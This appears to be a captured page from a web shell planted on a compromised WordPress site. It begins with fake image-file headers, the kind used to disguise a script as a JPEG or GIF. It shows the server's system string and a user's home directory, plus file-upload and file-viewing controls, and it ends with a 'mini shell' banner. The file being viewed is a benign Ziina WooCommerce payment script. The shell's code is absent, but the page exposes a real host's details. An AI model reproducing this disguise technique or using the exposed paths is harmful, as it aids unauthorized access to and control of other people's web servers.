ÿØÿà JFIF  H H ÿÛ C   GIF89; Eú tiket mi chék chéúfetál .

Eú tiket mi chék chéúfetál .

System: Linux server378.web-hosting.com 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64

Current Path : /home/aliyykcz/public_html/wp-content/updraft/plugins-old/ziina/assets/js/
Upload File :
Current File : /home/aliyykcz/public_html/wp-content/updraft/plugins-old/ziina/assets/js/woo-blocks.js

if (window.wc
    && window.wc.wcBlocksRegistry
    && window.React
) {
    /**
     * External dependencies
     */
    const {registerPaymentMethod} = wc.wcBlocksRegistry;
    const {createElement} = React;
    const {__} = wp.i18n;
    const {getSetting} = wc.wcSettings;
    const {decodeEntities} = wp.htmlEntities;

    /**
     * Internal dependencies
     */
    const PAYMENT_METHOD_NAME = 'ziina'

    const settings = getSetting('ziina_data', {});
    const defaultLabel = __(
        'Ziina Payment',
        'ziina'
    );
    const label = decodeEntities(settings.title) || defaultLabel;

    /**
     * Content component
     */
    const Content = createElement((props) => {
        return decodeEntities(settings.description || '');
    }, null);

    /**
     * Label component
     *
     * @param {*} props Props from payment API.
     */
    const Label = createElement(props => {
        const {PaymentMethodLabel} = props.components;
        return createElement(PaymentMethodLabel, {text: label})
    }, null)

    /**
     * Bank transfer (ZiinaPayment) payment method config object.
     */
    const bankTransferPaymentMethod = {
        name: PAYMENT_METHOD_NAME,
        label: Label,
        content: Content,
        edit: Content,
        canMakePayment: () => true,
        ariaLabel: label,
        supports: {
            features: settings?.supports ?? [],
        },
    };

    registerPaymentMethod(bankTransferPaymentMethod);
}

xxxxx1.0, XXX xxxx
SPECIMENT MINI SHELL - RECODED FROM PHANTOM GHOST